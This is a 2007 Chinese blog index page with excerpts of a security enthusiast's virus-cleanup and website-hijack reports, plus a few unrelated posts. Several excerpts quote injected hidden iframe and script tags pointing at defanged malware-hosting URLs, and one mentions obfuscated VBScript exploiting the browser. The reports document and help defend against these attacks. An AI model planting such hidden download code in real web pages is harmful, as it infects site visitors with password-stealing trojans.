- 博客(18)
- 收藏
- 关注
某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
endurer 原创2007-02-28 第1版该网站的网页末被加入代码:/------<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe><iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6...
2007-02-28 22:51:00
93
又收到一只瑞星寄来的卡卡狮……汗!
想不到收假回来,上班第一天就收到了瑞星寄来的包裹单……下午去领了,打开一看,又是一只卡卡狮,此外还有一条笔~ 卡卡狮与去年收到的那只相似: PP中的这个卡卡狮是去年收到的,PP是卡卡社区反病毒论坛版主baohe拍的本来想把反病...
2007-02-28 22:48:00
100
节后 威金/Viking 来拜年
endurer 原创2007-02-26 第1版一位同事说他的电脑工作异常,让偶帮忙检查看看。到 http://endurer.ys168.com 下载了 HijackThis 扫描log,发现可疑项:/-----Logfile of HijackThis v1.99.1Scan saved at 9:04:52, on 2007-2-26Platform: Windows XP ...
2007-02-26 14:20:00
69
下次启动自动删除文件程序 Auto_Del V0.0.0006 正式版
更新记录日期 版本 更新内容 2007.02.16 0.0.0006<nobr>(14,848 字节)</nobr> 1、加入延迟删除技术2、改写了窗口界面,支持窗口缩放3、增加Windows XP 控件风格MD5 : a61f238c1...
2007-02-16 16:12:00
128
[原]节前熊猫来烧香
endurer原创2007-02-16 第1版昨天一位朋友的电脑发现了熊猫烧香病毒,过去一看,这个国宝藏在共享文件夹里的EXE文件。 <!----><!----> Scanned file: Games.VIR000 - Infected Games.VIR000 - infec...
2007-02-16 13:43:00
80
遭遇GoogleUpdaterService.exe
endurer 原创2007-02-15 第1版前晚处理完万能搜索(WANSO,Trojan.AdPlayer.a)等东东后,准备把先前备份的病毒样本文件发到邮箱。之前一直是用资源管理器来浏览网页的,这次是双击桌面上的IE图标,结果发现首页是hxxp://www.7288.com(记得不是很准确了),觉得不正常,接着江民KV的实时监控就提示Google的东东有动作,偶当时点击了禁止按钮...
2007-02-15 23:27:00
105
遭遇万能搜索(WANSO,RootKit.Agent.sa,Trojan.AdPlayer.a)、kuzhan等N多病毒
endurer 原创2007-02-14 第1版昨晚,一位朋友说他家的电脑最近经常死机、重启,让偶帮忙检修看看。到 http://endurer.ys168.com 下载 HijackThis 扫描log,发现如下可疑项:/---------Logfile of HijackThis v1.99.1Scan saved at 19:43:59, on 2007-02-13Platf...
2007-02-14 21:32:00
726
如何使用JavaScript和正则表达式进行数据验证
作者: Tony Patton 2006-09-20 17:12:43数据验证是网络应用软件从客户端接受数据的重要步骤,毕竟,您需要在使用客户数据前确保其符合预期的格式。在网络应用程序中,您可以选择使用特定平台的工具,比如ASP.NET、JSP等等,或者您可以利用客户端JavaScript的优势,JavaScript中的正则表达式可以简化数据验证的工作。正则表达式正则表达式是一种模式匹...
2007-02-13 09:29:00
89
某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等
endurer 原创2007-02-12 第1版该网站首页首部被加入代码:/--------<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm width=0 height=0></iframe><iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=...
2007-02-12 20:37:00
343
又遇灰鸽子
endurer 原创2007-02-11 第1版一位网友发email来说电脑中了灰鸽子,并附有 HijackThis的log。在HijackThis的log发现如下可疑项:/-----O6 - HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions presentO6 - HKCU/Software/Policie...
2007-02-11 23:47:00
119
下次启动自动删除文件程序 Auto_Del 说明与下载(V0.0.0006 Beta1)
一、简介这个程序是在“瑞星杀毒助手”的“下次启动时自动删除病毒文件”的功能基础上修改而来,主要是方便我们删除一些当前无法删除的文件,比如一些杀毒软件检测到但无法清除/删除的染毒文件。 关于"瑞星杀毒助手"请看免费软件“瑞星杀毒助手”说明和下载二、运行环境: Microsoft WINDOWS 95或其后继中文版本。 三、程序的界面: 0.0.0006的窗口界面是重新设计的,支持Windows XP...
2007-02-10 17:56:00
227
US-CERT:一个宝贵的安全工具免费来源(译完)
US-CERT: A free source of valuable security toolsUS-CERT:一个宝贵的安全工具免费来源Date: February 5th, 2007日期:2007-02-05 Blogger: Tom Olzak博客:Tom Olzak翻译:endurer Category: Security, Computer Cr...
2007-02-08 23:22:00
173
电脑开机启时弹出错误信息框,说找不到文件helper.dll……
endurer 原创2007-02-06 第1版一位网友的电脑开机启时弹出错误信息框,说找不到文件helper.dll,让偶通过QQ远程协助帮忙检修。用HijackThis扫描log,发现了雅虎/3721上网助手的启动项,卸载了。用HijackThis扫描启动项列表,发现一些可疑服务:/-----StartupList report, 2007-2-6, 12:13:07Startup...
2007-02-06 22:28:00
373
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
endurer 原创2007-02-05 第1版网站首页被加入代码:/------<iframe height=0 width=0 src="hxxp://www.g**ao**jun***888.com/4"></iframe>------/打开网页4 中包含Javascript代码,输出一段加入多余空格、使用escape()加密的VBScript脚本程序。该VBScript脚本程序利用...
2007-02-05 23:34:00
152
观清华大学队用弹簧秤称大象表现不佳有感
前几天在电视上看了中央电视台《异想天开》栏目举办的用弹簧秤称大象比赛,参赛的有4个队(在网上google搜索,有消息说是共10个队):网络队,清华大学队(以下简称清华队),黑马组合队,家庭队。 先来看看清华队的方法。最初设想的方法是:找一辆卡车,先空车匀速行驶一段时间,称出所耗油量,然后让卡车载着大象在同样匀速行驶一段时间,称出所耗油量,从而算出象重。 因难于找到可以让卡车匀速行驶的路,清...
2007-02-04 22:17:00
110
遭遇Trojan.PSW.JHOnline,Trojan.Spy.Agent等之后
endurer 原创2007-01-03 第1版一位网友的电脑在查杀病毒后,启动时进入桌面前有出错提示音。让偶通过QQ远程协助检修。到 http://endurer.ys168.com 下载了 HijackThis 扫描 log,未见异常。用pe_xscan扫描,发现可疑服务项:/----pe_xscan by Purple Endurer2007-2-3 11:21:4Windows...
2007-02-03 17:03:00
99
隐藏的文件显示不了?与“虎”谋皮?
endurer 原创2007-02-02 第1版一位网友说他的电脑杀毒后,隐藏文件显示不出来了,让偶通过QQ远程协助帮忙检修。到 http://endurer.ys168.com 下载了 HijackThis 扫描 log,发现可疑项:/--------O6 - HKCU/Software/Policies/Microsoft/Internet Explorer/Control Pan...
2007-02-02 21:52:00
75
某论坛被加入下载Trojan-clicker.Win32.VB.qq的代码
endurer 原创2007-02-01 第1版论坛首页被加入代码:/------<script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"></script>------/m***d5.asp?ad*=1**** 中发现代码:/------docu...
2007-02-01 21:50:00
89
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人